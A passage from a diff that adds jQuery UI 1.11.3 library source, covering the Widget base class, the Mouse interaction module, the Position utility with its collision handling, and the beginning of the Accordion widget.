+					$.data( this, fullName, new object( options, this ) );
+				}
+			});
+		}
+
+		return returnValue;
+	};
+};
+
+$.Widget = function( /* options, element */ ) {};
+$.Widget._childConstructors = [];
+
+$.Widget.prototype = {
+	widgetName: "widget",
+	widgetEventPrefix: "",
+	defaultElement: "<div>",
+	options: {
+		disabled: false,
+
+		// callbacks
+		create: null
+	},
+	_createWidget: function( options, element ) {
+		element = $( element || this.defaultElement || this )[ 0 ];
+		this.element = $( element );
+		this.uuid = widget_uuid++;
+		this.eventNamespace = "." + this.widgetName + this.uuid;
+
+		this.bindings = $();
+		this.hoverable = $();
+		this.focusable = $();
+
+		if ( element !== this ) {
+			$.data( element, this.widgetFullName, this );
+			this._on( true, this.element, {
+				remove: function( event ) {
+					if ( event.target === element ) {
+						this.destroy();
+					}
+				}
+			});
+			this.document = $( element.style ?
+				// element within the document
+				element.ownerDocument :
+				// element is window or document
+				element.document || element );
+			this.window = $( this.document[0].defaultView || this.document[0].parentWindow );
+		}
+
+		this.options = $.widget.extend( {},
+			this.options,
+			this._getCreateOptions(),
+			options );
+
+		this._create();
+		this._trigger( "create", null, this._getCreateEventData() );
+		this._init();
+	},
+	_getCreateOptions: $.noop,
+	_getCreateEventData: $.noop,
+	_create: $.noop,
+	_init: $.noop,
+
+	destroy: function() {
+		this._destroy();
+		// we can probably remove the unbind calls in 2.0
+		// all event bindings should go through this._on()
+		this.element
+			.unbind( this.eventNamespace )
+			.removeData( this.widgetFullName )
+			// support: jquery <1.6.3
+			// http://bugs.jquery.com/ticket/9413
+			.removeData( $.camelCase( this.widgetFullName ) );
+		this.widget()
+			.unbind( this.eventNamespace )
+			.removeAttr( "aria-disabled" )
+			.removeClass(
+				this.widgetFullName + "-disabled " +
+				"ui-state-disabled" );
+
+		// clean up events and states
+		this.bindings.unbind( this.eventNamespace );
+		this.hoverable.removeClass( "ui-state-hover" );
+		this.focusable.removeClass( "ui-state-focus" );
+	},
+	_destroy: $.noop,
+
+	widget: function() {
+		return this.element;
+	},
+
+	option: function( key, value ) {
+		var options = key,
+			parts,
+			curOption,
+			i;
+
+		if ( arguments.length === 0 ) {
+			// don't return a reference to the internal hash
+			return $.widget.extend( {}, this.options );
+		}
+
+		if ( typeof key === "string" ) {
+			// handle nested keys, e.g., "foo.bar" => { foo: { bar: ___ } }
+			options = {};
+			parts = key.split( "." );
+			key = parts.shift();
+			if ( parts.length ) {
+				curOption = options[ key ] = $.widget.extend( {}, this.options[ key ] );
+				for ( i = 0; i < parts.length - 1; i++ ) {
+					curOption[ parts[ i ] ] = curOption[ parts[ i ] ] || {};
+					curOption = curOption[ parts[ i ] ];
+				}
+				key = parts.pop();
+				if ( arguments.length === 1 ) {
+					return curOption[ key ] === undefined ? null : curOption[ key ];
+				}
+				curOption[ key ] = value;
+			} else {
+				if ( arguments.length === 1 ) {
+					return this.options[ key ] === undefined ? null : this.options[ key ];
+				}
+				options[ key ] = value;
+			}
+		}
+
+		this._setOptions( options );
+
+		return this;
+	},
+	_setOptions: function( options ) {
+		var key;
+
+		for ( key in options ) {
+			this._setOption( key, options[ key ] );
+		}
+
+		return this;
+	},
+	_setOption: function( key, value ) {
+		this.options[ key ] = value;
+
+		if ( key === "disabled" ) {
+			this.widget()
+				.toggleClass( this.widgetFullName + "-disabled", !!value );
+
+			// If the widget is becoming disabled, then nothing is interactive
+			if ( value ) {
+				this.hoverable.removeClass( "ui-state-hover" );
+				this.focusable.removeClass( "ui-state-focus" );
+			}
+		}
+
+		return this;
+	},
+
+	enable: function() {
+		return this._setOptions({ disabled: false });
+	},
+	disable: function() {
+		return this._setOptions({ disabled: true });
+	},
+
+	_on: function( suppressDisabledCheck, element, handlers ) {
+		var delegateElement,
+			instance = this;
+
+		// no suppressDisabledCheck flag, shuffle arguments
+		if ( typeof suppressDisabledCheck !== "boolean" ) {
+			handlers = element;
+			element = suppressDisabledCheck;
+			suppressDisabledCheck = false;
+		}
+
+		// no element argument, shuffle and use this.element
+		if ( !handlers ) {
+			handlers = element;
+			element = this.element;
+			delegateElement = this.widget();
+		} else {
+			element = delegateElement = $( element );
+			this.bindings = this.bindings.add( element );
+		}
+
+		$.each( handlers, function( event, handler ) {
+			function handlerProxy() {
+				// allow widgets to customize the disabled handling
+				// - disabled as an array instead of boolean
+				// - disabled class as method for disabling individual parts
+				if ( !suppressDisabledCheck &&
+						( instance.options.disabled === true ||
+							$( this ).hasClass( "ui-state-disabled" ) ) ) {
+					return;
+				}
+				return ( typeof handler === "string" ? instance[ handler ] : handler )
+					.apply( instance, arguments );
+			}
+
+			// copy the guid so direct unbinding works
+			if ( typeof handler !== "string" ) {
+				handlerProxy.guid = handler.guid =
+					handler.guid || handlerProxy.guid || $.guid++;
+			}
+
+			var match = event.match( /^([\w:-]*)\s*(.*)$/ ),
+				eventName = match[1] + instance.eventNamespace,
+				selector = match[2];
+			if ( selector ) {
+				delegateElement.delegate( selector, eventName, handlerProxy );
+			} else {
+				element.bind( eventName, handlerProxy );
+			}
+		});
+	},
+
+	_off: function( element, eventName ) {
+		eventName = (eventName || "").split( " " ).join( this.eventNamespace + " " ) +
+			this.eventNamespace;
+		element.unbind( eventName ).undelegate( eventName );
+
+		// Clear the stack to avoid memory leaks (#10056)
+		this.bindings = $( this.bindings.not( element ).get() );
+		this.focusable = $( this.focusable.not( element ).get() );
+		this.hoverable = $( this.hoverable.not( element ).get() );
+	},
+
+	_delay: function( handler, delay ) {
+		function handlerProxy() {
+			return ( typeof handler === "string" ? instance[ handler ] : handler )
+				.apply( instance, arguments );
+		}
+		var instance = this;
+		return setTimeout( handlerProxy, delay || 0 );
+	},
+
+	_hoverable: function( element ) {
+		this.hoverable = this.hoverable.add( element );
+		this._on( element, {
+			mouseenter: function( event ) {
+				$( event.currentTarget ).addClass( "ui-state-hover" );
+			},
+			mouseleave: function( event ) {
+				$( event.currentTarget ).removeClass( "ui-state-hover" );
+			}
+		});
+	},
+
+	_focusable: function( element ) {
+		this.focusable = this.focusable.add( element );
+		this._on( element, {
+			focusin: function( event ) {
+				$( event.currentTarget ).addClass( "ui-state-focus" );
+			},
+			focusout: function( event ) {
+				$( event.currentTarget ).removeClass( "ui-state-focus" );
+			}
+		});
+	},
+
+	_trigger: function( type, event, data ) {
+		var prop, orig,
+			callback = this.options[ type ];
+
+		data = data || {};
+		event = $.Event( event );
+		event.type = ( type === this.widgetEventPrefix ?
+			type :
+			this.widgetEventPrefix + type ).toLowerCase();
+		// the original event may come from any element
+		// so we need to reset the target on the new event
+		event.target = this.element[ 0 ];
+
+		// copy original event properties over to the new event
+		orig = event.originalEvent;
+		if ( orig ) {
+			for ( prop in orig ) {
+				if ( !( prop in event ) ) {
+					event[ prop ] = orig[ prop ];
+				}
+			}
+		}
+
+		this.element.trigger( event, data );
+		return !( $.isFunction( callback ) &&
+			callback.apply( this.element[0], [ event ].concat( data ) ) === false ||
+			event.isDefaultPrevented() );
+	}
+};
+
+$.each( { show: "fadeIn", hide: "fadeOut" }, function( method, defaultEffect ) {
+	$.Widget.prototype[ "_" + method ] = function( element, options, callback ) {
+		if ( typeof options === "string" ) {
+			options = { effect: options };
+		}
+		var hasOptions,
+			effectName = !options ?
+				method :
+				options === true || typeof options === "number" ?
+					defaultEffect :
+					options.effect || defaultEffect;
+		options = options || {};
+		if ( typeof options === "number" ) {
+			options = { duration: options };
+		}
+		hasOptions = !$.isEmptyObject( options );
+		options.complete = callback;
+		if ( options.delay ) {
+			element.delay( options.delay );
+		}
+		if ( hasOptions && $.effects && $.effects.effect[ effectName ] ) {
+			element[ method ]( options );
+		} else if ( effectName !== method && element[ effectName ] ) {
+			element[ effectName ]( options.duration, options.easing, callback );
+		} else {
+			element.queue(function( next ) {
+				$( this )[ method ]();
+				if ( callback ) {
+					callback.call( element[ 0 ] );
+				}
+				next();
+			});
+		}
+	};
+});
+
+var widget = $.widget;
+
+
+/*!
+ * jQuery UI Mouse 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/mouse/
+ */
+
+
+var mouseHandled = false;
+$( document ).mouseup( function() {
+	mouseHandled = false;
+});
+
+var mouse = $.widget("ui.mouse", {
+	version: "1.11.3",
+	options: {
+		cancel: "input,textarea,button,select,option",
+		distance: 1,
+		delay: 0
+	},
+	_mouseInit: function() {
+		var that = this;
+
+		this.element
+			.bind("mousedown." + this.widgetName, function(event) {
+				return that._mouseDown(event);
+			})
+			.bind("click." + this.widgetName, function(event) {
+				if (true === $.data(event.target, that.widgetName + ".preventClickEvent")) {
+					$.removeData(event.target, that.widgetName + ".preventClickEvent");
+					event.stopImmediatePropagation();
+					return false;
+				}
+			});
+
+		this.started = false;
+	},
+
+	// TODO: make sure destroying one instance of mouse doesn't mess with
+	// other instances of mouse
+	_mouseDestroy: function() {
+		this.element.unbind("." + this.widgetName);
+		if ( this._mouseMoveDelegate ) {
+			this.document
+				.unbind("mousemove." + this.widgetName, this._mouseMoveDelegate)
+				.unbind("mouseup." + this.widgetName, this._mouseUpDelegate);
+		}
+	},
+
+	_mouseDown: function(event) {
+		// don't let more than one widget handle mouseStart
+		if ( mouseHandled ) {
+			return;
+		}
+
+		this._mouseMoved = false;
+
+		// we may have missed mouseup (out of window)
+		(this._mouseStarted && this._mouseUp(event));
+
+		this._mouseDownEvent = event;
+
+		var that = this,
+			btnIsLeft = (event.which === 1),
+			// event.target.nodeName works around a bug in IE 8 with
+			// disabled inputs (#7620)
+			elIsCancel = (typeof this.options.cancel === "string" && event.target.nodeName ? $(event.target).closest(this.options.cancel).length : false);
+		if (!btnIsLeft || elIsCancel || !this._mouseCapture(event)) {
+			return true;
+		}
+
+		this.mouseDelayMet = !this.options.delay;
+		if (!this.mouseDelayMet) {
+			this._mouseDelayTimer = setTimeout(function() {
+				that.mouseDelayMet = true;
+			}, this.options.delay);
+		}
+
+		if (this._mouseDistanceMet(event) && this._mouseDelayMet(event)) {
+			this._mouseStarted = (this._mouseStart(event) !== false);
+			if (!this._mouseStarted) {
+				event.preventDefault();
+				return true;
+			}
+		}
+
+		// Click event may never have fired (Gecko & Opera)
+		if (true === $.data(event.target, this.widgetName + ".preventClickEvent")) {
+			$.removeData(event.target, this.widgetName + ".preventClickEvent");
+		}
+
+		// these delegates are required to keep context
+		this._mouseMoveDelegate = function(event) {
+			return that._mouseMove(event);
+		};
+		this._mouseUpDelegate = function(event) {
+			return that._mouseUp(event);
+		};
+
+		this.document
+			.bind( "mousemove." + this.widgetName, this._mouseMoveDelegate )
+			.bind( "mouseup." + this.widgetName, this._mouseUpDelegate );
+
+		event.preventDefault();
+
+		mouseHandled = true;
+		return true;
+	},
+
+	_mouseMove: function(event) {
+		// Only check for mouseups outside the document if you've moved inside the document
+		// at least once. This prevents the firing of mouseup in the case of IE<9, which will
+		// fire a mousemove event if content is placed under the cursor. See #7778
+		// Support: IE <9
+		if ( this._mouseMoved ) {
+			// IE mouseup check - mouseup happened when mouse was out of window
+			if ($.ui.ie && ( !document.documentMode || document.documentMode < 9 ) && !event.button) {
+				return this._mouseUp(event);
+
+			// Iframe mouseup check - mouseup occurred in another document
+			} else if ( !event.which ) {
+				return this._mouseUp( event );
+			}
+		}
+
+		if ( event.which || event.button ) {
+			this._mouseMoved = true;
+		}
+
+		if (this._mouseStarted) {
+			this._mouseDrag(event);
+			return event.preventDefault();
+		}
+
+		if (this._mouseDistanceMet(event) && this._mouseDelayMet(event)) {
+			this._mouseStarted =
+				(this._mouseStart(this._mouseDownEvent, event) !== false);
+			(this._mouseStarted ? this._mouseDrag(event) : this._mouseUp(event));
+		}
+
+		return !this._mouseStarted;
+	},
+
+	_mouseUp: function(event) {
+		this.document
+			.unbind( "mousemove." + this.widgetName, this._mouseMoveDelegate )
+			.unbind( "mouseup." + this.widgetName, this._mouseUpDelegate );
+
+		if (this._mouseStarted) {
+			this._mouseStarted = false;
+
+			if (event.target === this._mouseDownEvent.target) {
+				$.data(event.target, this.widgetName + ".preventClickEvent", true);
+			}
+
+			this._mouseStop(event);
+		}
+
+		mouseHandled = false;
+		return false;
+	},
+
+	_mouseDistanceMet: function(event) {
+		return (Math.max(
+				Math.abs(this._mouseDownEvent.pageX - event.pageX),
+				Math.abs(this._mouseDownEvent.pageY - event.pageY)
+			) >= this.options.distance
+		);
+	},
+
+	_mouseDelayMet: function(/* event */) {
+		return this.mouseDelayMet;
+	},
+
+	// These are placeholder methods, to be overriden by extending plugin
+	_mouseStart: function(/* event */) {},
+	_mouseDrag: function(/* event */) {},
+	_mouseStop: function(/* event */) {},
+	_mouseCapture: function(/* event */) { return true; }
+});
+
+
+/*!
+ * jQuery UI Position 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/position/
+ */
+
+(function() {
+
+$.ui = $.ui || {};
+
+var cachedScrollbarWidth, supportsOffsetFractions,
+	max = Math.max,
+	abs = Math.abs,
+	round = Math.round,
+	rhorizontal = /left|center|right/,
+	rvertical = /top|center|bottom/,
+	roffset = /[\+\-]\d+(\.[\d]+)?%?/,
+	rposition = /^\w+/,
+	rpercent = /%$/,
+	_position = $.fn.position;
+
+function getOffsets( offsets, width, height ) {
+	return [
+		parseFloat( offsets[ 0 ] ) * ( rpercent.test( offsets[ 0 ] ) ? width / 100 : 1 ),
+		parseFloat( offsets[ 1 ] ) * ( rpercent.test( offsets[ 1 ] ) ? height / 100 : 1 )
+	];
+}
+
+function parseCss( element, property ) {
+	return parseInt( $.css( element, property ), 10 ) || 0;
+}
+
+function getDimensions( elem ) {
+	var raw = elem[0];
+	if ( raw.nodeType === 9 ) {
+		return {
+			width: elem.width(),
+			height: elem.height(),
+			offset: { top: 0, left: 0 }
+		};
+	}
+	if ( $.isWindow( raw ) ) {
+		return {
+			width: elem.width(),
+			height: elem.height(),
+			offset: { top: elem.scrollTop(), left: elem.scrollLeft() }
+		};
+	}
+	if ( raw.preventDefault ) {
+		return {
+			width: 0,
+			height: 0,
+			offset: { top: raw.pageY, left: raw.pageX }
+		};
+	}
+	return {
+		width: elem.outerWidth(),
+		height: elem.outerHeight(),
+		offset: elem.offset()
+	};
+}
+
+$.position = {
+	scrollbarWidth: function() {
+		if ( cachedScrollbarWidth !== undefined ) {
+			return cachedScrollbarWidth;
+		}
+		var w1, w2,
+			div = $( "<div style='display:block;position:absolute;width:50px;height:50px;overflow:hidden;'><div style='height:100px;width:auto;'></div></div>" ),
+			innerDiv = div.children()[0];
+
+		$( "body" ).append( div );
+		w1 = innerDiv.offsetWidth;
+		div.css( "overflow", "scroll" );
+
+		w2 = innerDiv.offsetWidth;
+
+		if ( w1 === w2 ) {
+			w2 = div[0].clientWidth;
+		}
+
+		div.remove();
+
+		return (cachedScrollbarWidth = w1 - w2);
+	},
+	getScrollInfo: function( within ) {
+		var overflowX = within.isWindow || within.isDocument ? "" :
+				within.element.css( "overflow-x" ),
+			overflowY = within.isWindow || within.isDocument ? "" :
+				within.element.css( "overflow-y" ),
+			hasOverflowX = overflowX === "scroll" ||
+				( overflowX === "auto" && within.width < within.element[0].scrollWidth ),
+			hasOverflowY = overflowY === "scroll" ||
+				( overflowY === "auto" && within.height < within.element[0].scrollHeight );
+		return {
+			width: hasOverflowY ? $.position.scrollbarWidth() : 0,
+			height: hasOverflowX ? $.position.scrollbarWidth() : 0
+		};
+	},
+	getWithinInfo: function( element ) {
+		var withinElement = $( element || window ),
+			isWindow = $.isWindow( withinElement[0] ),
+			isDocument = !!withinElement[ 0 ] && withinElement[ 0 ].nodeType === 9;
+		return {
+			element: withinElement,
+			isWindow: isWindow,
+			isDocument: isDocument,
+			offset: withinElement.offset() || { left: 0, top: 0 },
+			scrollLeft: withinElement.scrollLeft(),
+			scrollTop: withinElement.scrollTop(),
+
+			// support: jQuery 1.6.x
+			// jQuery 1.6 doesn't support .outerWidth/Height() on documents or windows
+			width: isWindow || isDocument ? withinElement.width() : withinElement.outerWidth(),
+			height: isWindow || isDocument ? withinElement.height() : withinElement.outerHeight()
+		};
+	}
+};
+
+$.fn.position = function( options ) {
+	if ( !options || !options.of ) {
+		return _position.apply( this, arguments );
+	}
+
+	// make a copy, we don't want to modify arguments
+	options = $.extend( {}, options );
+
+	var atOffset, targetWidth, targetHeight, targetOffset, basePosition, dimensions,
+		target = $( options.of ),
+		within = $.position.getWithinInfo( options.within ),
+		scrollInfo = $.position.getScrollInfo( within ),
+		collision = ( options.collision || "flip" ).split( " " ),
+		offsets = {};
+
+	dimensions = getDimensions( target );
+	if ( target[0].preventDefault ) {
+		// force left top to allow flipping
+		options.at = "left top";
+	}
+	targetWidth = dimensions.width;
+	targetHeight = dimensions.height;
+	targetOffset = dimensions.offset;
+	// clone to reuse original targetOffset later
+	basePosition = $.extend( {}, targetOffset );
+
+	// force my and at to have valid horizontal and vertical positions
+	// if a value is missing or invalid, it will be converted to center
+	$.each( [ "my", "at" ], function() {
+		var pos = ( options[ this ] || "" ).split( " " ),
+			horizontalOffset,
+			verticalOffset;
+
+		if ( pos.length === 1) {
+			pos = rhorizontal.test( pos[ 0 ] ) ?
+				pos.concat( [ "center" ] ) :
+				rvertical.test( pos[ 0 ] ) ?
+					[ "center" ].concat( pos ) :
+					[ "center", "center" ];
+		}
+		pos[ 0 ] = rhorizontal.test( pos[ 0 ] ) ? pos[ 0 ] : "center";
+		pos[ 1 ] = rvertical.test( pos[ 1 ] ) ? pos[ 1 ] : "center";
+
+		// calculate offsets
+		horizontalOffset = roffset.exec( pos[ 0 ] );
+		verticalOffset = roffset.exec( pos[ 1 ] );
+		offsets[ this ] = [
+			horizontalOffset ? horizontalOffset[ 0 ] : 0,
+			verticalOffset ? verticalOffset[ 0 ] : 0
+		];
+
+		// reduce to just the positions without the offsets
+		options[ this ] = [
+			rposition.exec( pos[ 0 ] )[ 0 ],
+			rposition.exec( pos[ 1 ] )[ 0 ]
+		];
+	});
+
+	// normalize collision option
+	if ( collision.length === 1 ) {
+		collision[ 1 ] = collision[ 0 ];
+	}
+
+	if ( options.at[ 0 ] === "right" ) {
+		basePosition.left += targetWidth;
+	} else if ( options.at[ 0 ] === "center" ) {
+		basePosition.left += targetWidth / 2;
+	}
+
+	if ( options.at[ 1 ] === "bottom" ) {
+		basePosition.top += targetHeight;
+	} else if ( options.at[ 1 ] === "center" ) {
+		basePosition.top += targetHeight / 2;
+	}
+
+	atOffset = getOffsets( offsets.at, targetWidth, targetHeight );
+	basePosition.left += atOffset[ 0 ];
+	basePosition.top += atOffset[ 1 ];
+
+	return this.each(function() {
+		var collisionPosition, using,
+			elem = $( this ),
+			elemWidth = elem.outerWidth(),
+			elemHeight = elem.outerHeight(),
+			marginLeft = parseCss( this, "marginLeft" ),
+			marginTop = parseCss( this, "marginTop" ),
+			collisionWidth = elemWidth + marginLeft + parseCss( this, "marginRight" ) + scrollInfo.width,
+			collisionHeight = elemHeight + marginTop + parseCss( this, "marginBottom" ) + scrollInfo.height,
+			position = $.extend( {}, basePosition ),
+			myOffset = getOffsets( offsets.my, elem.outerWidth(), elem.outerHeight() );
+
+		if ( options.my[ 0 ] === "right" ) {
+			position.left -= elemWidth;
+		} else if ( options.my[ 0 ] === "center" ) {
+			position.left -= elemWidth / 2;
+		}
+
+		if ( options.my[ 1 ] === "bottom" ) {
+			position.top -= elemHeight;
+		} else if ( options.my[ 1 ] === "center" ) {
+			position.top -= elemHeight / 2;
+		}
+
+		position.left += myOffset[ 0 ];
+		position.top += myOffset[ 1 ];
+
+		// if the browser doesn't support fractions, then round for consistent results
+		if ( !supportsOffsetFractions ) {
+			position.left = round( position.left );
+			position.top = round( position.top );
+		}
+
+		collisionPosition = {
+			marginLeft: marginLeft,
+			marginTop: marginTop
+		};
+
+		$.each( [ "left", "top" ], function( i, dir ) {
+			if ( $.ui.position[ collision[ i ] ] ) {
+				$.ui.position[ collision[ i ] ][ dir ]( position, {
+					targetWidth: targetWidth,
+					targetHeight: targetHeight,
+					elemWidth: elemWidth,
+					elemHeight: elemHeight,
+					collisionPosition: collisionPosition,
+					collisionWidth: collisionWidth,
+					collisionHeight: collisionHeight,
+					offset: [ atOffset[ 0 ] + myOffset[ 0 ], atOffset [ 1 ] + myOffset[ 1 ] ],
+					my: options.my,
+					at: options.at,
+					within: within,
+					elem: elem
+				});
+			}
+		});
+
+		if ( options.using ) {
+			// adds feedback as second argument to using callback, if present
+			using = function( props ) {
+				var left = targetOffset.left - position.left,
+					right = left + targetWidth - elemWidth,
+					top = targetOffset.top - position.top,
+					bottom = top + targetHeight - elemHeight,
+					feedback = {
+						target: {
+							element: target,
+							left: targetOffset.left,
+							top: targetOffset.top,
+							width: targetWidth,
+							height: targetHeight
+						},
+						element: {
+							element: elem,
+							left: position.left,
+							top: position.top,
+							width: elemWidth,
+							height: elemHeight
+						},
+						horizontal: right < 0 ? "left" : left > 0 ? "right" : "center",
+						vertical: bottom < 0 ? "top" : top > 0 ? "bottom" : "middle"
+					};
+				if ( targetWidth < elemWidth && abs( left + right ) < targetWidth ) {
+					feedback.horizontal = "center";
+				}
+				if ( targetHeight < elemHeight && abs( top + bottom ) < targetHeight ) {
+					feedback.vertical = "middle";
+				}
+				if ( max( abs( left ), abs( right ) ) > max( abs( top ), abs( bottom ) ) ) {
+					feedback.important = "horizontal";
+				} else {
+					feedback.important = "vertical";
+				}
+				options.using.call( this, props, feedback );
+			};
+		}
+
+		elem.offset( $.extend( position, { using: using } ) );
+	});
+};
+
+$.ui.position = {
+	fit: {
+		left: function( position, data ) {
+			var within = data.within,
+				withinOffset = within.isWindow ? within.scrollLeft : within.offset.left,
+				outerWidth = within.width,
+				collisionPosLeft = position.left - data.collisionPosition.marginLeft,
+				overLeft = withinOffset - collisionPosLeft,
+				overRight = collisionPosLeft + data.collisionWidth - outerWidth - withinOffset,
+				newOverRight;
+
+			// element is wider than within
+			if ( data.collisionWidth > outerWidth ) {
+				// element is initially over the left side of within
+				if ( overLeft > 0 && overRight <= 0 ) {
+					newOverRight = position.left + overLeft + data.collisionWidth - outerWidth - withinOffset;
+					position.left += overLeft - newOverRight;
+				// element is initially over right side of within
+				} else if ( overRight > 0 && overLeft <= 0 ) {
+					position.left = withinOffset;
+				// element is initially over both left and right sides of within
+				} else {
+					if ( overLeft > overRight ) {
+						position.left = withinOffset + outerWidth - data.collisionWidth;
+					} else {
+						position.left = withinOffset;
+					}
+				}
+			// too far left -> align with left edge
+			} else if ( overLeft > 0 ) {
+				position.left += overLeft;
+			// too far right -> align with right edge
+			} else if ( overRight > 0 ) {
+				position.left -= overRight;
+			// adjust based on position and margin
+			} else {
+				position.left = max( position.left - collisionPosLeft, position.left );
+			}
+		},
+		top: function( position, data ) {
+			var within = data.within,
+				withinOffset = within.isWindow ? within.scrollTop : within.offset.top,
+				outerHeight = data.within.height,
+				collisionPosTop = position.top - data.collisionPosition.marginTop,
+				overTop = withinOffset - collisionPosTop,
+				overBottom = collisionPosTop + data.collisionHeight - outerHeight - withinOffset,
+				newOverBottom;
+
+			// element is taller than within
+			if ( data.collisionHeight > outerHeight ) {
+				// element is initially over the top of within
+				if ( overTop > 0 && overBottom <= 0 ) {
+					newOverBottom = position.top + overTop + data.collisionHeight - outerHeight - withinOffset;
+					position.top += overTop - newOverBottom;
+				// element is initially over bottom of within
+				} else if ( overBottom > 0 && overTop <= 0 ) {
+					position.top = withinOffset;
+				// element is initially over both top and bottom of within
+				} else {
+					if ( overTop > overBottom ) {
+						position.top = withinOffset + outerHeight - data.collisionHeight;
+					} else {
+						position.top = withinOffset;
+					}
+				}
+			// too far up -> align with top
+			} else if ( overTop > 0 ) {
+				position.top += overTop;
+			// too far down -> align with bottom edge
+			} else if ( overBottom > 0 ) {
+				position.top -= overBottom;
+			// adjust based on position and margin
+			} else {
+				position.top = max( position.top - collisionPosTop, position.top );
+			}
+		}
+	},
+	flip: {
+		left: function( position, data ) {
+			var within = data.within,
+				withinOffset = within.offset.left + within.scrollLeft,
+				outerWidth = within.width,
+				offsetLeft = within.isWindow ? within.scrollLeft : within.offset.left,
+				collisionPosLeft = position.left - data.collisionPosition.marginLeft,
+				overLeft = collisionPosLeft - offsetLeft,
+				overRight = collisionPosLeft + data.collisionWidth - outerWidth - offsetLeft,
+				myOffset = data.my[ 0 ] === "left" ?
+					-data.elemWidth :
+					data.my[ 0 ] === "right" ?
+						data.elemWidth :
+						0,
+				atOffset = data.at[ 0 ] === "left" ?
+					data.targetWidth :
+					data.at[ 0 ] === "right" ?
+						-data.targetWidth :
+						0,
+				offset = -2 * data.offset[ 0 ],
+				newOverRight,
+				newOverLeft;
+
+			if ( overLeft < 0 ) {
+				newOverRight = position.left + myOffset + atOffset + offset + data.collisionWidth - outerWidth - withinOffset;
+				if ( newOverRight < 0 || newOverRight < abs( overLeft ) ) {
+					position.left += myOffset + atOffset + offset;
+				}
+			} else if ( overRight > 0 ) {
+				newOverLeft = position.left - data.collisionPosition.marginLeft + myOffset + atOffset + offset - offsetLeft;
+				if ( newOverLeft > 0 || abs( newOverLeft ) < overRight ) {
+					position.left += myOffset + atOffset + offset;
+				}
+			}
+		},
+		top: function( position, data ) {
+			var within = data.within,
+				withinOffset = within.offset.top + within.scrollTop,
+				outerHeight = within.height,
+				offsetTop = within.isWindow ? within.scrollTop : within.offset.top,
+				collisionPosTop = position.top - data.collisionPosition.marginTop,
+				overTop = collisionPosTop - offsetTop,
+				overBottom = collisionPosTop + data.collisionHeight - outerHeight - offsetTop,
+				top = data.my[ 1 ] === "top",
+				myOffset = top ?
+					-data.elemHeight :
+					data.my[ 1 ] === "bottom" ?
+						data.elemHeight :
+						0,
+				atOffset = data.at[ 1 ] === "top" ?
+					data.targetHeight :
+					data.at[ 1 ] === "bottom" ?
+						-data.targetHeight :
+						0,
+				offset = -2 * data.offset[ 1 ],
+				newOverTop,
+				newOverBottom;
+			if ( overTop < 0 ) {
+				newOverBottom = position.top + myOffset + atOffset + offset + data.collisionHeight - outerHeight - withinOffset;
+				if ( newOverBottom < 0 || newOverBottom < abs( overTop ) ) {
+					position.top += myOffset + atOffset + offset;
+				}
+			} else if ( overBottom > 0 ) {
+				newOverTop = position.top - data.collisionPosition.marginTop + myOffset + atOffset + offset - offsetTop;
+				if ( newOverTop > 0 || abs( newOverTop ) < overBottom ) {
+					position.top += myOffset + atOffset + offset;
+				}
+			}
+		}
+	},
+	flipfit: {
+		left: function() {
+			$.ui.position.flip.left.apply( this, arguments );
+			$.ui.position.fit.left.apply( this, arguments );
+		},
+		top: function() {
+			$.ui.position.flip.top.apply( this, arguments );
+			$.ui.position.fit.top.apply( this, arguments );
+		}
+	}
+};
+
+// fraction support test
+(function() {
+	var testElement, testElementParent, testElementStyle, offsetLeft, i,
+		body = document.getElementsByTagName( "body" )[ 0 ],
+		div = document.createElement( "div" );
+
+	//Create a "fake body" for testing based on method used in jQuery.support
+	testElement = document.createElement( body ? "div" : "body" );
+	testElementStyle = {
+		visibility: "hidden",
+		width: 0,
+		height: 0,
+		border: 0,
+		margin: 0,
+		background: "none"
+	};
+	if ( body ) {
+		$.extend( testElementStyle, {
+			position: "absolute",
+			left: "-1000px",
+			top: "-1000px"
+		});
+	}
+	for ( i in testElementStyle ) {
+		testElement.style[ i ] = testElementStyle[ i ];
+	}
+	testElement.appendChild( div );
+	testElementParent = body || document.documentElement;
+	testElementParent.insertBefore( testElement, testElementParent.firstChild );
+
+	div.style.cssText = "position: absolute; left: 10.7432222px;";
+
+	offsetLeft = $( div ).offset().left;
+	supportsOffsetFractions = offsetLeft > 10 && offsetLeft < 11;
+
+	testElement.innerHTML = "";
+	testElementParent.removeChild( testElement );
+})();
+
+})();
+
+var position = $.ui.position;
+
+
+/*!
+ * jQuery UI Accordion 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/accordion/
+ */
+
+
+var accordion = $.widget( "ui.accordion", {
+	version: "1.11.3",
+	options: {
+		active: 0,
+		animate: {},
+		collapsible: false,
+		event: "click",
+		header: "> li > :first-child,> :not(li):even",
+		heightStyle: "auto",
+		icons: {
+			activeHeader: "ui-icon-triangle-1-s",
+			header: "ui-icon-triangle-1-e"
+		},
+
+		// callbacks
+		activate: null,
+		beforeActivate: null
+	},
+
+	hideProps: {
+		borderTopWidth: "hide",
+		borderBottomWidth: "hide",
+		paddingTop: "hide",
+		paddingBottom: "hide",
+		height: "hide"
+	},
+
+	showProps: {
+		borderTopWidth: "show",
+		borderBottomWidth: "show",
+		paddingTop: "show",
+		paddingBottom: "show",
+		height: "show"
+	},
+
+	_create: function() {
+		var options = this.options;
+		this.prevShow = this.prevHide = $();
+		this.element.addClass( "ui-accordion ui-widget ui-helper-reset" )
+			// ARIA
+			.attr( "role", "tablist" );
+
+		// don't allow collapsible: false and active: false / null
+		if ( !options.collapsible && (options.active === false || options.active == null) ) {
+			options.active = 0;
+		}
+
+		this._processPanels();
+		// handle negative values
+		if ( options.active < 0 ) {
+			options.active += this.headers.length;
+		}
+		this._refresh();
+	},
+
+	_getCreateEventData: function() {
+		return {
+			header: this.active,
+			panel: !this.active.length ? $() : this.active.next()
+		};
+	},
+
+	_createIcons: function() {
+		var icons = this.options.icons;
+		if ( icons ) {
+			$( "<span>" )
+				.addClass( "ui-accordion-header-icon ui-icon " + icons.header )
+				.prependTo( this.headers );
+			this.active.children( ".ui-accordion-header-icon" )
+				.removeClass( icons.header )
+				.addClass( icons.activeHeader );
+			this.headers.addClass( "ui-accordion-icons" );
+		}
+	},
+
+	_destroyIcons: function() {
+		this.headers
